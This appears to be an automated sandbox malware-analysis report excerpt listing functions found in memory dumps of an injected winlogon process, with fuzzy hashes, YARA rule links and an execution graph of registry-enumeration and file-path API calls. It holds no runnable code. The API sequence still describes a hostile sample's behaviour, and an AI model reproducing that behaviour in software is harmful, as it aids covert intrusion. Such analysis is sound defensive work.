                                                                                Function 000001E8589BA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3310065596.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: b8cb1cdd645de17ac90d150e5576baa1f770b257ea5295feeb99f43c7e10e3bf
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: A9517A322292C0CEEB648B65D45439CB7E0FB55B96F188227DE9D87B95CF39D490C702
                                                                                Function 000001E85895A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 0ad0f10a0311de8fe70e4511306a68505f179f6318197c4e8bd1820910d7e08b
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: DF517E322242C1CAEB648B25E44439DB7E0FF55B9AF184127DE9D87B95CF38D491CB0A
                                                                                Function 000001E85898AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 49808e8ca0374573422c17999fa92c520f6827b0ca759f7661e9c90c8d8cbcb6
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: C85138732206C2CBEB648B25D58439DB7E0EB54B99F184126DE9D87A96CF38D491CF02
                                                                                Function 000001E8589B8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3310065596.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: 5afbde93f76065e937d33a33ecda40d7cc0652e0afb463397a4e63f594b95558
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: B751B932629280CEEB55CF15E445BDCB799FB48BD9F508076DE0A63788EFB4D8418704
                                                                                Function 000001E858958405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: bfd78980145a28763c880af9517e8ac90edd43b032dea0cdb72a4fbda65ea15a
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: 4A51AC32621680CAEB14CF15E445BDEB799FF54B9AF508176DE4E63788EF34D8428B04
                                                                                Function 000001E8589B83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3310065596.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: a63bd806f66d012ce775473c1f40d5f64a693a31238674c758956550f9c12806
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: F0318832225680DAEB159F11E849BDDBBA9FB48BD9F458036AE5E13788DF38C940C704
                                                                                Function 000001E8589583E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: 56d3e007963a7e7881fb8535ced7d73073085fdb1eb8715deed5cad551f2bc8b
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: AD317C32221680D6EB14DF12E8457DEB7A4FF40B9AF958026EE5E17784DF38D941C704
                                                                                Function 000001E858992058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction ID: 5158255b9f45075a47059d5597f2be23213eaa00bc29a0f5feecf0f9424b8990
                                                                                • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction Fuzzy Hash: 6BD1AE32B24AC0C9E711CFA9D4402ECBBB6FB54B98F144226DE6E97B99DE34C516C740
                                                                                Function 000001E8589814A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction ID: 87d0c39c7ef690860e2d692a8e2b1ea7438f5f62204bc229bf9756ed41ae7668
                                                                                • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction Fuzzy Hash: FA014832620AD0C6E715EFA6E90418EB7A2FB88FC1F044436EE4E43729EE38C051C740
                                                                                Function 000001E858992980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction ID: 12399152d6f5684d12032a5c33f3ea79e7a8066ea1a4d7d76d6e965cdc9918e8
                                                                                • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction Fuzzy Hash: DD91AD327206D0C5F7609FA9D8803EDFBA6BB45B98F14412BDE2E67A95DE34C486C700
                                                                                Function 000001E85898253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction ID: dc5de42c1dc400c54a34142e8686c4d9b9fee3a7d214c8df3c00669743a542fc
                                                                                • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction Fuzzy Hash: 357190362207C2CAE7259EA6E8443EEF795FB89B84F440037DD0E53B89DE35D6458B00
                                                                                Function 000001E8589B9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3310065596.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: 479c25fd653139756ea47a74aec904b6b413ad4f2ed2086552f17bedce541712
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: EC614632A29B84CAEB20DF65D4403DDB7A0FB49B99F144226EE4D17B98EF38D595C700
                                                                                Function 000001E858959E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: 094ec712c1b288e37f31cb4837e425075fcca7128a69f700356e5ae3858f6197
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: A1612632A25B84CAEB20DF65E4403DDB7A0FB45B89F144226EE4D17B99DF38D595CB00
                                                                                Function 000001E858982330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction ID: 414b1109d79ba0e870cecf76c2af5f31b5d4bde43533dd6e83f510ec87595dfc
                                                                                • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction Fuzzy Hash: 6951BD322287C2C1F664DAAAE4983EEF791FB95780F450137DE5E03B99DE39C9048B50
                                                                                Function 000001E8589926F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction ID: dcdd8cd598e05c42887886c746ddf0c279423bf44c0c1bf9e557dc900a05699c
                                                                                • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction Fuzzy Hash: 2A416072625A80C6EB209F65E4443EDF7A2FB98794F514032EE4E87794EF38C441C740
                                                                                Function 000001E8589894A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: 449c3b8d4a9707330a2244a19cbde2a29dd6a88ab94e040f38e9f4c0bfe6f638
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: 5F110A36224B8182EB618F25F44439DB7E5FB88B94F584226EE8D47B69DF3CC551CB00
                                                                                Function 000001E8589B7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3310065596.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 0e26cef9ba68d931c57e211af9cd086a3cc8b9350f618ba4ce6d2e1c4988f689
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: 2AE08671650B84D4DF018F21E8802DC73A4EF58B64B8891339D5C06311FE38D1E9C300
                                                                                Function 000001E858957356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: b226c5ef1287e80dd1a639188cd00b7be9ee93c87761d6bca3fa593d7edb1d27
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: 32E04F61660B84D0DB058F22E8412D873A09F58B64F8891229D5C06311EE38D1E9C300
                                                                                Function 000001E8589B73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3310065596.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: ebbb92f6b71bc6aeecd0247755a998ea3fb1c1d57f03a5a9e81a6553625eb14e
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: FDE08C71A20B88C4DF028F21E8802DCB3A4EF68B68F889133CE4C06311EE38D1E9C300
                                                                                Function 000001E8589573B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: d79e25d1bddce505cbefe66c1f7dc3f1dcce17b3d3d0eb5f19f21b045c52fa15
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 4AE0B661A61B88D4DB068F62E8912D8B3A5AB68B64FC89122DE5C56355EE38D1E9C300
                                                                                Function 000001E858981BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: bae03b9de4d8a0968d4e15549a5e41e9ffeeedaf31b7d182c916321c4c0c0085
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: 4E113D35721BC5C1EA55DB66E8042ADB7A1FB89FC0F184036DE4D57765DE38C4428700
                                                                                Function 000001E858981268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: bf3232b7a1a84d483810c562108e731f4be810f9750f62d4ac0e33b9570d4307
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: D6E03935721684C6EB158BA2D80838ABAE2EB89B46F0480258D0907361EF7D8499C750

                                                                                Execution Graph

                                                                                Execution Coverage:0.9%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:131
                                                                                Total number of Limit Nodes:10
                                                                                execution_graph 14903 140adfc273c 14905 140adfc276a 14903->14905 14904 140adfc2858 LoadLibraryA 14904->14905 14905->14904 14906 140adfc28d4 14905->14906 14907 140ae86202c 14909 140ae86205d 14907->14909 14908 140ae86213e 14909->14908 14910 140ae862173 14909->14910 14916 140ae862081 14909->14916 14911 140ae8621e7 14910->14911 14912 140ae862178 14910->14912 14911->14908 14915 140ae862f04 7 API calls 14911->14915 14925 140ae862f04 GetProcessHeap 14912->14925 14914 140ae8620b9 StrCmpNIW 14914->14916 14915->14908 14916->14908 14916->14914 14918 140ae861bf4 14916->14918 14919 140ae861c8b __free_lconv_mon 14918->14919 14920 140ae861c1b GetProcessHeap 14918->14920 14919->14916 14921 140ae861c41 __std_exception_copy 14920->14921 14921->14919 14922 140ae861c77 GetProcessHeap 14921->14922 14932 140ae86152c 14921->14932 14922->14919 14930 140ae862f40 __std_exception_copy 14925->14930 14926 140ae863015 GetProcessHeap 14927 140ae863029 __free_lconv_mon 14926->14927 14927->14908 14928 140ae863010 14928->14926 14929 140ae862fa2 StrCmpNIW 14929->14930 14930->14926 14930->14928 14930->14929 14931 140ae861bf4 4 API calls 14930->14931 14931->14930 14933 140ae86157c 14932->14933 14936 140ae861546 14932->14936 14933->14922 14934 140ae861565 StrCmpW 14934->14936 14935 140ae86155d StrCmpIW 14935->14936 14936->14933 14936->14934 14936->14935 14937 140ae861abc 14943 140ae861628 GetProcessHeap 14937->14943 14939 140ae861ad2 Sleep SleepEx 14941 140ae861acb 14939->14941 14941->14939 14942 140ae861598 StrCmpIW StrCmpW 14941->14942 14988 140ae8618b4 14941->14988 14942->14941 14944 140ae861648 __std_exception_copy 14943->14944 15005 140ae861268 GetProcessHeap 14944->15005 14946 140ae861650 14947 140ae861268 2 API calls 14946->14947 14948 140ae861661 14947->14948 14949 140ae861268 2 API calls 14948->14949 14950 140ae86166a 14949->14950 14951 140ae861268 2 API calls 14950->14951 14952 140ae861673 14951->14952 14953 140ae86168e RegOpenKeyExW 14952->14953 14954 140ae8618a6 14953->14954 14955 140ae8616c0 RegOpenKeyExW 14953->14955 14954->14941 14956 140ae8616ff RegOpenKeyExW 14955->14956 14957 140ae8616e9 14955->14957 14959 140ae861723 14956->14959 14960 140ae86173a RegOpenKeyExW 14956->14960 15009 140ae8612bc RegQueryInfoKeyW 14957->15009 15020 140ae86104c RegQueryInfoKeyW 14959->15020 14963 140ae861775 RegOpenKeyExW 14960->14963 14964 140ae86175e 14960->14964 14961 140ae8616f5 RegCloseKey 14961->14956 14965 140ae8617b0 RegOpenKeyExW 14963->14965 14966 140ae861799 14963->14966 14968 140ae8612bc 11 API calls 14964->14968 14970 140ae8617d4 14965->14970 14971 140ae8617eb RegOpenKeyExW 14965->14971 14969 140ae8612bc 11 API calls 14966->14969 14972 140ae86176b RegCloseKey 14968->14972 14973 140ae8617a6 RegCloseKey 14969->14973 14974 140ae8612bc 11 API calls 14970->14974 14975 140ae861826 RegOpenKeyExW 14971->14975 14976 140ae86180f 14971->14976 14972->14963 14973->14965 14977 140ae8617e1 RegCloseKey 14974->14977 14979 140ae861861 RegOpenKeyExW 14975->14979 14980 140ae86184a 14975->14980 14978 140ae86104c 4 API calls 14976->14978 14977->14971 14983 140ae86181c RegCloseKey 14978->14983 14981 140ae861885 14979->14981 14982 140ae86189c RegCloseKey 14979->14982 14984 140ae86104c 4 API calls 14980->14984 14985 140ae86104c 4 API calls 14981->14985 14982->14954 14983->14975 14986 140ae861857 RegCloseKey 14984->14986 14987 140ae861892 RegCloseKey 14985->14987 14986->14979 14987->14982 15027 140ae8614a4 14988->15027 15026 140ae876168 15005->15026 15007 140ae861283 GetProcessHeap 15008 140ae8612ae __std_exception_copy 15007->15008 15008->14946 15010 140ae861327 GetProcessHeap 15009->15010 15011 140ae86148a __free_lconv_mon 15009->15011 15014 140ae86133e __std_exception_copy __free_lconv_mon 15010->15014 15011->14961 15012 140ae861476 GetProcessHeap 15012->15011 15013 140ae861352 RegEnumValueW 15013->15014 15014->15012 15014->15013 15015 140ae86152c 2 API calls 15014->15015 15016 140ae8613d3 GetProcessHeap 15014->15016 15017 140ae86141e lstrlenW GetProcessHeap 15014->15017 15018 140ae861443 StrCpyW 15014->15018 15019 140ae8613f3 GetProcessHeap 15014->15019 15015->15014 15016->15014 15017->15014 15018->15014 15019->15014 15021 140ae8611b5 RegCloseKey 15020->15021 15022 140ae8610bf __std_exception_copy __free_lconv_mon 15020->15022 15021->14960 15022->15021 15023 140ae8610cf RegEnumValueW 15022->15023 15024 140ae86114e GetProcessHeap 15022->15024 15025 140ae86116e GetProcessHeap 15022->15025 15023->15022 15024->15022 15025->15022 15028 140ae8614e1 GetProcessHeap 15027->15028 15029 140ae8614c1 GetProcessHeap 15027->15029 15033 140ae876180 15028->15033 15031 140ae8614da __free_lconv_mon 15029->15031 15031->15028 15031->15029 15034 140ae876182 15033->15034 15035 140ae86253c 15037 140ae8625bb 15035->15037 15036 140ae8627aa 15037->15036 15038 140ae86261d GetFileType 15037->15038 15039 140ae862641 15038->15039 15040 140ae86262b StrCpyW 15038->15040 15051 140ae861a40 GetFinalPathNameByHandleW 15039->15051 15042 140ae862650 15040->15042 15045 140ae86265a 15042->15045 15049 140ae8626ff 15042->15049 15044 140ae863844 StrCmpNIW 15044->15049 15045->15036 15056 140ae863844 15045->15056 15059 140ae863044 StrCmpIW 15045->15059 15063 140ae861cac 15045->15063 15048 140ae863044 4 API calls 15048->15049 15049->15036 15049->15044 15049->15048 15050 140ae861cac 2 API calls 15049->15050 15050->15049 15052 140ae861a6a StrCmpNIW 15051->15052 15053 140ae861aa9 15051->15053 15052->15053 15054 140ae861a84 